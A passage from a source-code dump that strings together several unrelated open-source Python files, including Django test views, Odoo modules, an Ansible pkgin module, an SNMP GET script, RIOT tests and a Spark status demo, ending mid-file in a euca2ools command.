                raise ValidationError(
                    "Forms in a set must have distinct email addresses."
                )
            seen.add(email)

TestFormSet = formset_factory(TestForm, BaseTestFormSet)
def formset_view(request):
    """Bind TestFormSet to the request data and report its validation state."""
    if request.method == 'POST':
        formset = TestFormSet(request.POST)
        if formset.is_valid():
            t = Template('Valid POST data.', name='Valid POST Template')
            c = Context()
        else:
            t = Template('Invalid POST data. {{ my_formset.errors }}',
                         name='Invalid POST Template')
            c = Context({'my_formset': formset})
    else:
        # Bug fix: this branch previously built a bare TestForm, so the
        # 'my_formset' context variable never actually held a formset.
        formset = TestFormSet(request.GET)
        t = Template('Viewing base formset. {{ my_formset }}.',
                     name='Formset GET Template')
        c = Context({'my_formset': formset})
    return HttpResponse(t.render(c))
def login_protected_view(request):
    """Render the requesting user's name; anonymous users are redirected to login."""
    t = Template('This is a login protected test. Username is {{ user.username }}.', name='Login Template')
    c = Context({'user': request.user})
    return HttpResponse(t.render(c))
# Old-style decoration: equivalent to putting @login_required above the def.
login_protected_view = login_required(login_protected_view)
def login_protected_view_changed_redirect(request):
    """Same as login_protected_view, but the login redirect uses a custom
    query parameter name ('redirect_to' instead of the default 'next')."""
    t = Template('This is a login protected test. Username is {{ user.username }}.', name='Login Template')
    c = Context({'user': request.user})
    return HttpResponse(t.render(c))
login_protected_view_changed_redirect = login_required(redirect_field_name="redirect_to")(login_protected_view_changed_redirect)
def _permission_protected_view(request):
    """Render the user's name and permissions; access requires a permission
    that is never granted, so these views always deny."""
    t = Template('This is a permission protected test. '
                 'Username is {{ user.username }}. '
                 'Permissions are {{ user.get_all_permissions }}.' ,
                 name='Permissions Template')
    c = Context({'user': request.user})
    return HttpResponse(t.render(c))
# The same body wrapped two ways: the first variant redirects to the login
# page on failure, the second raises PermissionDenied (HTTP 403) because of
# raise_exception=True.
permission_protected_view = permission_required('permission_not_granted')(_permission_protected_view)
permission_protected_view_exception = permission_required('permission_not_granted', raise_exception=True)(_permission_protected_view)
class _ViewManager(object):
    """Method-based views for testing method_decorator with auth decorators."""

    @method_decorator(login_required)
    def login_protected_view(self, request):
        t = Template('This is a login protected test using a method. '
                     'Username is {{ user.username }}.',
                     name='Login Method Template')
        c = Context({'user': request.user})
        return HttpResponse(t.render(c))

    @method_decorator(permission_required('permission_not_granted'))
    def permission_protected_view(self, request):
        t = Template('This is a permission protected test using a method. '
                     'Username is {{ user.username }}. '
                     'Permissions are {{ user.get_all_permissions }}.' ,
                     name='Permissions Template')
        c = Context({'user': request.user})
        return HttpResponse(t.render(c))

# Bound methods of a single shared instance, exported as plain view callables.
_view_manager = _ViewManager()
login_protected_method_view = _view_manager.login_protected_view
permission_protected_method_view = _view_manager.permission_protected_view
def session_view(request):
    """Store a marker value in the session and render a stub page."""
    request.session['tobacconist'] = 'hovercraft'
    template = Template('This is a view that modifies the session.',
                        name='Session Modifying View Template')
    return HttpResponse(template.render(Context()))
def broken_view(request):
    """A view which just raises an exception, simulating a broken view."""
    raise KeyError("Oops! Looks like you wrote some bad code.")
def mail_sending_view(request):
    """Send one fixed test email and report success."""
    message = mail.EmailMessage(
        "Test message",
        "This is a test email",
        "from@example.com",
        ['first@example.com', 'second@example.com'])
    message.send()
    return HttpResponse("Mail sent")
def mass_mail_sending_view(request):
    """Send two test emails over a single connection and report success."""
    messages = [
        mail.EmailMessage(
            'First Test message',
            'This is the first test email',
            'from@example.com',
            ['first@example.com', 'second@example.com']),
        mail.EmailMessage(
            'Second Test message',
            'This is the second test email',
            'from@example.com',
            ['second@example.com', 'third@example.com']),
    ]
    connection = mail.get_connection()
    connection.send_messages(messages)
    return HttpResponse("Mail sent")
| apache-2.0 |
rven/odoo | addons/fleet/__manifest__.py | 3 | 1513 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
{
'name' : 'Fleet',
'version' : '0.1',
'sequence': 185,
'category': 'Human Resources/Fleet',
'website' : 'https://www.odoo.com/page/fleet',
'summary' : 'Manage your fleet and track car costs',
'description' : """
Vehicle, leasing, insurances, cost
==================================
With this module, Odoo helps you managing all your vehicles, the
contracts associated to those vehicle as well as services, costs
and many other features necessary to the management of your fleet
of vehicle(s)
Main Features
-------------
* Add vehicles to your fleet
* Manage contracts for vehicles
* Reminder when a contract reach its expiration date
* Add services, odometer values for all vehicles
* Show all costs associated to a vehicle or to a type of service
* Analysis graph for costs
""",
'depends': [
'base',
'mail',
],
'data': [
'security/fleet_security.xml',
'security/ir.model.access.csv',
'views/fleet_vehicle_model_views.xml',
'views/fleet_vehicle_views.xml',
'views/fleet_vehicle_cost_views.xml',
'views/fleet_board_view.xml',
'views/mail_activity_views.xml',
'views/res_config_settings_views.xml',
'data/fleet_cars_data.xml',
'data/fleet_data.xml',
'data/mail_data.xml',
],
'demo': ['data/fleet_demo.xml'],
'installable': True,
'application': True,
}
| agpl-3.0 |
odoo-turkiye/odoo | addons/procurement_jit_stock/procurement_jit_stock.py | 44 | 1585 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2013 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv
class procurement_order(osv.osv):
    """Extend procurement.order so that running one procurement also runs,
    just-in-time, the procurements chained behind its destination moves."""
    _inherit = "procurement.order"

    def run(self, cr, uid, ids, context=None):
        # procurement_autorun_defer presumably tells the stock module to skip
        # its automatic scheduler pass so the chain is handled here instead
        # -- confirm against the stock module's procurement code.
        context = dict(context or {}, procurement_autorun_defer=True)
        res = super(procurement_order, self).run(cr, uid, ids, context=context)

        # Recurse into procurements whose destination move was produced by the
        # ones just run, walking the whole chain in one synchronous pass.
        procurement_ids = self.search(cr, uid, [('move_dest_id.procurement_id', 'in', ids)], order='id', context=context)

        if procurement_ids:
            return self.run(cr, uid, procurement_ids, context=context)
        return res
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
gautam1858/tensorflow | tensorflow/python/estimator/canned/linear.py | 41 | 1278 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""linear python module.
Importing from tensorflow.python.estimator is unsupported
and will soon break!
"""
# pylint: disable=unused-import,g-bad-import-order,g-import-not-at-top,wildcard-import
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow_estimator.python.estimator.canned import linear
# Include attrs that start with single underscore.
_HAS_DYNAMIC_ATTRIBUTES = True
linear.__all__ = [s for s in dir(linear) if not s.startswith('__')]
from tensorflow_estimator.python.estimator.canned.linear import *
| apache-2.0 |
fjorba/invenio | modules/elmsubmit/lib/elmsubmit_config.py | 35 | 4216 | ## This file is part of Invenio.
## Copyright (C) 2006, 2007, 2008, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""ElmSubmit configuration parameters."""
__revision__ = "$Id$"
from invenio.config import CFG_SITE_ADMIN_EMAIL, \
CFG_SITE_URL, CFG_SITE_NAME
# elmsubmit configuration file:
CFG_ELMSUBMIT_FILES = {
    # 'mailprefix' is presumably the filename prefix used when storing
    # incoming mails -- confirm against elmsubmit's mail-handling code.
    'mailprefix': 'mail',
    'test_case_1': 'elmsubmit_tests_1.mbox',
    'test_case_2': 'elmsubmit_tests_2.mbox',
}
# Messages we need to send to the user, before we've identified the
# correct language to talk to them in (so we assume English!):
# pylint: disable=C0301
CFG_ELMSUBMIT_NOLANGMSGS = {'bad_email': 'Your email could not be parsed correctly to discover a submission. Please check your email client is functioning correctly.',
'bad_submission': 'The submission data that you have provided could not be parsed correctly. Please visit <%s> for a description of the correct format.' % CFG_SITE_URL,
'missing_type': 'The submission data that you have provided does not contain a TYPE field. This is mandatory for all submissions.',
'unsupported_type': 'The TYPE field of your submission does not contain a recognized value.',
'missing_fields_1': 'Your submission of type',
'missing_fields_2': 'does not contain all the required fields:',
'bad_field': 'This field does not validate correctly:',
'correct_format': 'It must be formatted as follows:',
'missing_attachment': 'We could not find the following file attached to your submission email:',
'temp_problem': 'There is a temporary problem with %s\'s email submission interface. Please retry your submission again shortly.' % CFG_SITE_NAME}
# Outgoing mail server used to reply to submitters.
CFG_ELMSUBMIT_SERVERS = {'smtp': 'localhost'}

# Contact addresses for operational notifications.
CFG_ELMSUBMIT_PEOPLE = {'admin': CFG_SITE_ADMIN_EMAIL}

# fields required in the submission mail
CFG_ELMSUBMIT_REQUIRED_FIELDS = ['title',
                                 'author',
                                 'date',
                                 'files']
# Defines the mapping of metadata fields to their MARC codes.
# When the mapped value is a list, the first occurrence of the field is mapped
# to the first MARC code in the list and all further occurrences to the second.
CFG_ELMSUBMIT_MARC_MAPPING = {'author': ['100__a', '700__a'],
'title': '245__a',
'subtitle': '245__b',
'photocaption': '246__b',
'subject': '65017a',
'secondary_subject': '65027a',
'email': '8560_f',
'files': ['FFT__a', 'FFT__a'],
'affiliation': ['100__u', '700__u'],
'language': '041__a',
'abstract': '520__a',
'keywords': '6531_a',
'OAIid': '909COo',
'PrimaryReportNumber': '037__a',
'AdditionalReportNumber': '088__a',
'series': ['490__a','490__v'],
'year': '260__a',
'note': '500__a',
#test tags used in test cases
'test1': '111__a',
'test2': '111__b',
'test3': '111__c',
'test4': '111__d',
'test5': '111__e'
}
# For each MARC field below, each listed group of subfield codes is joined
# into a single datafield.
CFG_ELMSUBMIT_MARC_FIELDS_JOINED = {'700__': [['a', 'u']],
'100__': [['a', 'u']],
#test tags
'111__': [['a','c'],['b','d']]
}
| gpl-2.0 |
cryptobanana/ansible | lib/ansible/modules/packaging/os/pkgin.py | 13 | 11257 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2013 Shaun Zinck <shaun.zinck at gmail.com>
# Copyright (c) 2015 Lawrence Leonard Gilbert <larry@L2G.to>
# Copyright (c) 2016 Jasper Lievisse Adriaanse <j at jasper.la>
#
# Written by Shaun Zinck
# Based on pacman module written by Afterburn <http://github.com/afterburn>
# that was based on apt module written by Matthew Williams <matthew@flowroute.com>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: pkgin
short_description: Package manager for SmartOS, NetBSD, et al.
description:
- "The standard package manager for SmartOS, but also usable on NetBSD
or any OS that uses C(pkgsrc). (Home: U(http://pkgin.net/))"
version_added: "1.0"
author:
- "Larry Gilbert (L2G)"
- "Shaun Zinck (@szinck)"
- "Jasper Lievisse Adriaanse (@jasperla)"
notes:
- "Known bug with pkgin < 0.8.0: if a package is removed and another
package depends on it, the other package will be silently removed as
well. New to Ansible 1.9: check-mode support."
options:
name:
description:
- Name of package to install/remove;
- multiple names may be given, separated by commas
required: false
default: null
state:
description:
- Intended state of the package
choices: [ 'present', 'absent' ]
required: false
default: present
update_cache:
description:
- Update repository database. Can be run with other steps or on its own.
required: false
default: no
choices: [ "yes", "no" ]
version_added: "2.1"
upgrade:
description:
- Upgrade main packages to their newer versions
required: false
default: no
choices: [ "yes", "no" ]
version_added: "2.1"
full_upgrade:
description:
- Upgrade all packages to their newer versions
required: false
default: no
choices: [ "yes", "no" ]
version_added: "2.1"
clean:
description:
- Clean packages cache
required: false
default: no
choices: [ "yes", "no" ]
version_added: "2.1"
force:
description:
- Force package reinstall
required: false
default: no
choices: [ "yes", "no" ]
version_added: "2.1"
'''
EXAMPLES = '''
# install package foo
- pkgin:
name: foo
state: present
# Update database and install "foo" package
- pkgin:
name: foo
update_cache: yes
# remove package foo
- pkgin:
name: foo
state: absent
# remove packages foo and bar
- pkgin:
name: foo,bar
state: absent
# Update repositories as a separate step
- pkgin:
update_cache: yes
# Upgrade main packages (equivalent to C(pkgin upgrade))
- pkgin:
upgrade: yes
# Upgrade all packages (equivalent to C(pkgin full-upgrade))
- pkgin:
full_upgrade: yes
# Force-upgrade all packages (equivalent to C(pkgin -F full-upgrade))
- pkgin:
full_upgrade: yes
force: yes
# clean packages cache (equivalent to C(pkgin clean))
- pkgin:
clean: yes
'''
import re
def query_package(module, name):
    """Search for the package by name.

    Possible return values:
    * "present"  - installed, no upgrade needed
    * "outdated" - installed, but can be upgraded
    * False      - not installed or not found
    """

    # test whether '-p' (parsable) flag is supported.
    rc, out, err = module.run_command("%s -p -v" % PKGIN_PATH)

    if rc == 0:
        # Parsable output separates columns with ';' instead of spaces.
        pflag = '-p'
        splitchar = ';'
    else:
        pflag = ''
        splitchar = ' '

    # Use "pkgin search" to find the package. The regular expression will
    # only match on the complete name.
    rc, out, err = module.run_command("%s %s search \"^%s$\"" % (PKGIN_PATH, pflag, name))

    # rc will not be 0 unless the search was a success
    if rc == 0:

        # Search results may contain more than one line (e.g., 'emacs'), so iterate
        # through each line to see if we have a match.
        packages = out.split('\n')

        for package in packages:

            # Break up line at spaces.  The first part will be the package with its
            # version (e.g. 'gcc47-libs-4.7.2nb4'), and the second will be the state
            # of the package:
            #     ''  - not installed
            #     '<' - installed but out of date
            #     '=' - installed and up to date
            #     '>' - installed but newer than the repository version
            pkgname_with_version, raw_state = package.split(splitchar)[0:2]

            # Search for package, stripping version
            # (results in sth like 'gcc47-libs' or 'emacs24-nox11')
            pkg_search_obj = re.search(r'^(.*?)\-[0-9][0-9.]*(nb[0-9]+)*', pkgname_with_version, re.M)

            # Do not proceed unless we have a match
            if not pkg_search_obj:
                continue

            # Grab matched string
            pkgname_without_version = pkg_search_obj.group(1)

            # Skip search hits that merely contain the requested name.
            if name != pkgname_without_version:
                continue

            # The package was found; now return its state
            if raw_state == '<':
                return 'outdated'
            elif raw_state == '=' or raw_state == '>':
                return 'present'
            else:
                return False
            # no fall-through

    # No packages were matched, so return False
    return False
def format_action_message(module, action, count):
    """Build a summary such as "removed 3 packages".

    In check mode the message is prefixed with "would have", since nothing
    was actually changed.
    """
    prefix = "would have " if module.check_mode else ""
    plural = "" if count == 1 else "s"
    return "%s%s %d package%s" % (prefix, action, count, plural)
def format_pkgin_command(module, command, package=None):
    """Assemble a full pkgin command line.

    Commands that take no package argument get an empty string, which pkgin
    simply ignores.  Check mode maps to ``pkgin -n`` (dry run); normal mode
    to ``pkgin -y``, plus ``-F`` when a forced (re)install was requested.
    """
    package = "" if package is None else package
    force = "-F" if module.params["force"] else ""

    if module.check_mode:
        return "%s -n %s %s" % (PKGIN_PATH, command, package)
    return "%s -y %s %s %s" % (PKGIN_PATH, force, command, package)
def remove_packages(module, packages):
    """Remove each installed package in *packages* and exit via the module."""
    removed = 0

    # One package at a time, so a failure can name the culprit.
    for package in packages:
        # Query the package first, to see if we even need to remove.
        if not query_package(module, package):
            continue

        rc, out, err = module.run_command(
            format_pkgin_command(module, "remove", package))

        if not module.check_mode and query_package(module, package):
            module.fail_json(msg="failed to remove %s: %s" % (package, out))

        removed += 1

    if removed:
        module.exit_json(changed=True, msg=format_action_message(module, "removed", removed))

    module.exit_json(changed=False, msg="package(s) already absent")
def install_packages(module, packages):
    """Install each missing package in *packages* and exit via the module."""
    installed = 0

    for package in packages:
        if query_package(module, package):
            continue

        rc, out, err = module.run_command(
            format_pkgin_command(module, "install", package))

        if not module.check_mode and not query_package(module, package):
            module.fail_json(msg="failed to install %s: %s" % (package, out))

        installed += 1

    if installed:
        module.exit_json(changed=True, msg=format_action_message(module, "installed", installed))

    module.exit_json(changed=False, msg="package(s) already present")
def update_package_db(module):
    """Refresh the pkgin repository database.

    Returns a ``(changed, message)`` tuple; fails the module when pkgin
    exits non-zero.
    """
    rc, out, err = module.run_command(
        format_pkgin_command(module, "update"))

    if rc == 0:
        if re.search('database for.*is up-to-date\n$', out):
            # Fix: the message previously contained the typo "datebase".
            return False, "database is up-to-date"
        else:
            return True, "updated repository database"
    else:
        module.fail_json(msg="could not update package db")
def do_upgrade_packages(module, full=False):
    """Run ``pkgin upgrade`` (or ``full-upgrade`` when *full* is true).

    Exits immediately with changed=False when pkgin reports nothing to do;
    otherwise falls through and lets the caller report success.
    """
    if full:
        cmd = "full-upgrade"
    else:
        cmd = "upgrade"

    rc, out, err = module.run_command(
        format_pkgin_command(module, cmd))

    if rc == 0:
        # NOTE(review): the '.' after "do" is an unescaped regex metacharacter,
        # so this also matches e.g. "nothing to doX" -- harmless in practice.
        if re.search('^nothing to do.\n$', out):
            module.exit_json(changed=False, msg="nothing left to upgrade")
    else:
        module.fail_json(msg="could not %s packages" % cmd)
def upgrade_packages(module):
    # Convenience wrapper: regular (non-full) upgrade.
    do_upgrade_packages(module)
def full_upgrade_packages(module):
    # Convenience wrapper: full upgrade of all packages.
    do_upgrade_packages(module, True)
def clean_cache(module):
    """Run ``pkgin clean`` and exit the module with the outcome."""
    rc, out, err = module.run_command(
        format_pkgin_command(module, "clean"))

    if rc != 0:
        module.fail_json(msg="could not clean package cache")

    # pkgin gives no indication whether 'clean' actually removed anything,
    # so assume it did.
    module.exit_json(changed=True, msg="cleaned caches")
def main():
    """Entry point: parse module arguments and dispatch to the actions."""
    module = AnsibleModule(
        argument_spec=dict(
            state=dict(default="present", choices=["present", "absent"]),
            name=dict(aliases=["pkg"], type='list'),
            update_cache=dict(default='no', type='bool'),
            upgrade=dict(default='no', type='bool'),
            full_upgrade=dict(default='no', type='bool'),
            clean=dict(default='no', type='bool'),
            force=dict(default='no', type='bool')),
        required_one_of=[['name', 'update_cache', 'upgrade', 'full_upgrade', 'clean']],
        supports_check_mode=True)

    global PKGIN_PATH
    PKGIN_PATH = module.get_bin_path('pkgin', True, ['/opt/local/bin'])

    # Force a predictable C locale so pkgin's output can be parsed reliably.
    module.run_command_environ_update = dict(LANG='C', LC_ALL='C', LC_MESSAGES='C', LC_CTYPE='C')

    p = module.params

    # Each maintenance action below exits the module immediately unless
    # package names were also supplied, in which case it runs first and the
    # install/remove follows.
    if p["update_cache"]:
        c, msg = update_package_db(module)
        if not (p['name'] or p["upgrade"] or p["full_upgrade"]):
            module.exit_json(changed=c, msg=msg)

    if p["upgrade"]:
        upgrade_packages(module)
        if not p['name']:
            module.exit_json(changed=True, msg='upgraded packages')

    if p["full_upgrade"]:
        full_upgrade_packages(module)
        if not p['name']:
            module.exit_json(changed=True, msg='upgraded all packages')

    if p["clean"]:
        clean_cache(module)
        if not p['name']:
            module.exit_json(changed=True, msg='cleaned caches')

    pkgs = p["name"]

    if p["state"] == "present":
        install_packages(module, pkgs)

    elif p["state"] == "absent":
        remove_packages(module, pkgs)
# import module snippets
# Wildcard import at the bottom is the historical Ansible module pattern:
# it brings AnsibleModule and helpers into module scope.
from ansible.module_utils.basic import *

if __name__ == '__main__':
    main()
| gpl-3.0 |
gsutil-mirrors/pyasn1-modules | tools/snmpget.py | 6 | 1444 | #!/usr/bin/env python
#
# This file is part of pyasn1-modules software.
#
# Copyright (c) 2005-2017, Ilya Etingof <etingof@gmail.com>
# License: http://pyasn1.sf.net/license.html
#
# Generate SNMPGET request, parse response
#
import socket
import sys
from pyasn1.codec.ber import decoder
from pyasn1.codec.ber import encoder
from pyasn1_modules import rfc1157
# Expect exactly three arguments: community string, target host and OID.
if len(sys.argv) != 4:
    print("""Usage:
$ %s <community> <host> <OID>""" % sys.argv[0])
    sys.exit(-1)

msg = rfc1157.Message()
# Component 0 is the SNMP version (left at its default, i.e. SNMPv1);
# component 1 is the community string.
msg.setComponentByPosition(0)
msg.setComponentByPosition(1, sys.argv[1])

# pdu
pdus = msg.setComponentByPosition(2).getComponentByPosition(2)
pdu = pdus.setComponentByPosition(0).getComponentByPosition(0)
# request-id, error-status, error-index
pdu.setComponentByPosition(0, 123)
pdu.setComponentByPosition(1, 0)
pdu.setComponentByPosition(2, 0)
# Single variable binding carrying the requested OID with an empty value.
vbl = pdu.setComponentByPosition(3).getComponentByPosition(3)
vb = vbl.setComponentByPosition(0).getComponentByPosition(0)
vb.setComponentByPosition(0, sys.argv[3])
v = vb.setComponentByPosition(1).getComponentByPosition(1).setComponentByPosition(0).getComponentByPosition(0).setComponentByPosition(3).getComponentByPosition(3)

print('sending: %s' % msg.prettyPrint())

# Fire the BER-encoded request at the standard SNMP port and wait for a reply.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(encoder.encode(msg), (sys.argv[2], 161))

substrate, _ = sock.recvfrom(2048)

# noinspection PyRedeclaration
rMsg, _ = decoder.decode(substrate, asn1Spec=msg)

print('received: %s' % rMsg.prettyPrint())
| bsd-2-clause |
neiljay/RIOT | tests/gnrc_sock_udp/tests/01-run.py | 2 | 3192 | #!/usr/bin/env python3
# Copyright (C) 2016 Kaspar Schleiser <kaspar@schleiser.de>
#
# This file is subject to the terms and conditions of the GNU Lesser
# General Public License v2.1. See the file LICENSE in the top level
# directory for more details.
import os
import sys
def testfunc(child):
child.expect_exact(u"Calling test_sock_udp_create__EADDRINUSE()")
child.expect_exact(u"Calling test_sock_udp_create__EAFNOSUPPORT()")
child.expect_exact(u"Calling test_sock_udp_create__EINVAL_addr()")
child.expect_exact(u"Calling test_sock_udp_create__EINVAL_netif()")
child.expect_exact(u"Calling test_sock_udp_create__no_endpoints()")
child.expect_exact(u"Calling test_sock_udp_create__only_local()")
child.expect_exact(u"Calling test_sock_udp_create__only_local_reuse_ep()")
child.expect_exact(u"Calling test_sock_udp_create__only_remote()")
child.expect_exact(u"Calling test_sock_udp_create__full()")
child.expect_exact(u"Calling test_sock_udp_recv__EADDRNOTAVAIL()")
child.expect_exact(u"Calling test_sock_udp_recv__EAGAIN()")
child.expect_exact(u"Calling test_sock_udp_recv__ENOBUFS()")
child.expect_exact(u"Calling test_sock_udp_recv__EPROTO()")
child.expect_exact(u"Calling test_sock_udp_recv__ETIMEDOUT()")
child.expect_exact(u" * Calling sock_udp_recv()")
child.expect(r" \* \(timed out with timeout \d+\)")
child.expect_exact(u"Calling test_sock_udp_recv__socketed()")
child.expect_exact(u"Calling test_sock_udp_recv__socketed_with_remote()")
child.expect_exact(u"Calling test_sock_udp_recv__unsocketed()")
child.expect_exact(u"Calling test_sock_udp_recv__unsocketed_with_remote()")
child.expect_exact(u"Calling test_sock_udp_recv__with_timeout()")
child.expect_exact(u"Calling test_sock_udp_recv__non_blocking()")
child.expect_exact(u"Calling test_sock_udp_send__EAFNOSUPPORT()")
child.expect_exact(u"Calling test_sock_udp_send__EINVAL_addr()")
child.expect_exact(u"Calling test_sock_udp_send__EINVAL_netif()")
child.expect_exact(u"Calling test_sock_udp_send__EINVAL_port()")
child.expect_exact(u"Calling test_sock_udp_send__ENOTCONN()")
child.expect_exact(u"Calling test_sock_udp_send__socketed_no_local_no_netif()")
child.expect_exact(u"Calling test_sock_udp_send__socketed_no_netif()")
child.expect_exact(u"Calling test_sock_udp_send__socketed_no_local()")
child.expect_exact(u"Calling test_sock_udp_send__socketed()")
child.expect_exact(u"Calling test_sock_udp_send__socketed_other_remote()")
child.expect_exact(u"Calling test_sock_udp_send__unsocketed_no_local_no_netif()")
child.expect_exact(u"Calling test_sock_udp_send__unsocketed_no_netif()")
child.expect_exact(u"Calling test_sock_udp_send__unsocketed_no_local()")
child.expect_exact(u"Calling test_sock_udp_send__unsocketed()")
child.expect_exact(u"Calling test_sock_udp_send__no_sock_no_netif()")
child.expect_exact(u"Calling test_sock_udp_send__no_sock()")
child.expect_exact(u"ALL TESTS SUCCESSFUL")
if __name__ == "__main__":
    # RIOT's testrunner lives under $RIOTTOOLS and is not on sys.path by
    # default, so add it before importing.
    sys.path.append(os.path.join(os.environ['RIOTTOOLS'], 'testrunner'))
    from testrunner import run
    sys.exit(run(testfunc))
| lgpl-2.1 |
mahak/spark | examples/src/main/python/status_api_demo.py | 26 | 2158 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import time
import threading
import queue as Queue
from pyspark import SparkConf, SparkContext
def delayed(seconds):
    """Build an identity mapper that pauses for *seconds* before returning.

    Used to slow the Spark tasks down enough for the status poller to
    observe them while they are still running.
    """
    def _sleepy_identity(value):
        time.sleep(seconds)
        return value
    return _sleepy_identity
def call_in_background(f, *args):
    """Invoke ``f(*args)`` on a daemon thread.

    Returns a one-slot queue that will eventually hold the call's result;
    poll it with ``empty()`` / ``get()``.
    """
    outcome = Queue.Queue(1)

    def _runner():
        outcome.put(f(*args))

    worker = threading.Thread(target=_runner)
    worker.daemon = True
    worker.start()
    return outcome
def main():
    """Run a small Spark job in the background while polling its status.

    Demonstrates ``SparkContext.statusTracker()``: job and stage progress is
    printed roughly once per second until the background collect() finishes.
    """
    # Disable the console progress bar so it does not interleave with output.
    conf = SparkConf().set("spark.ui.showConsoleProgress", "false")
    sc = SparkContext(appName="PythonStatusAPIDemo", conf=conf)

    def run():
        # 10 partitions, each element sleeping 2s per map stage, gives the
        # poller below time to observe active tasks.
        rdd = sc.parallelize(range(10), 10).map(delayed(2))
        reduced = rdd.map(lambda x: (x, 1)).reduceByKey(lambda x, y: x + y)
        return reduced.map(delayed(2)).collect()

    result = call_in_background(run)

    status = sc.statusTracker()
    # Poll until the background thread deposits the job result in the queue.
    while result.empty():
        ids = status.getJobIdsForGroup()
        for id in ids:  # NOTE(review): shadows the builtin `id` — harmless here
            job = status.getJobInfo(id)
            print("Job", id, "status: ", job.status)
            for sid in job.stageIds:
                info = status.getStageInfo(sid)
                if info:
                    print("Stage %d: %d tasks total (%d active, %d complete)" %
                          (sid, info.numTasks, info.numActiveTasks, info.numCompletedTasks))
        time.sleep(1)

    print("Job results are:", result.get())
    sc.stop()
# Standard script entry point.
if __name__ == "__main__":
    main()
| apache-2.0 |
nagyistoce/euca2ools | euca2ools/commands/autoscaling/updateautoscalinggroup.py | 6 | 4140 | # Copyright 2013 Eucalyptus Systems, Inc.
#
# Redistribution and use of this software in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from euca2ools.commands.argtypes import delimited_list
from euca2ools.commands.autoscaling import AutoScalingRequest
from requestbuilder import Arg
class UpdateAutoScalingGroup(AutoScalingRequest):
    """Declarative request definition for the UpdateAutoScalingGroup call.

    requestbuilder turns DESCRIPTION/ARGS into both the CLI help text and
    the request parameters (each Arg's ``dest`` is the API parameter name).
    """
    DESCRIPTION = "Update an auto-scaling group's parameters"
    ARGS = [Arg('AutoScalingGroupName', metavar='ASGROUP',
                help='name of the auto-scaling group to update (required)'),
            Arg('--default-cooldown', dest='DefaultCooldown',
                metavar='SECONDS', type=int,
                help='''amount of time, in seconds, after a scaling activity
                completes before any further trigger-related scaling
                activities may start'''),
            Arg('--desired-capacity', dest='DesiredCapacity', metavar='COUNT',
                type=int,
                help='number of running instances the group should contain'),
            Arg('--grace-period', dest='HealthCheckGracePeriod',
                metavar='SECONDS', type=int, help='''number of seconds to wait
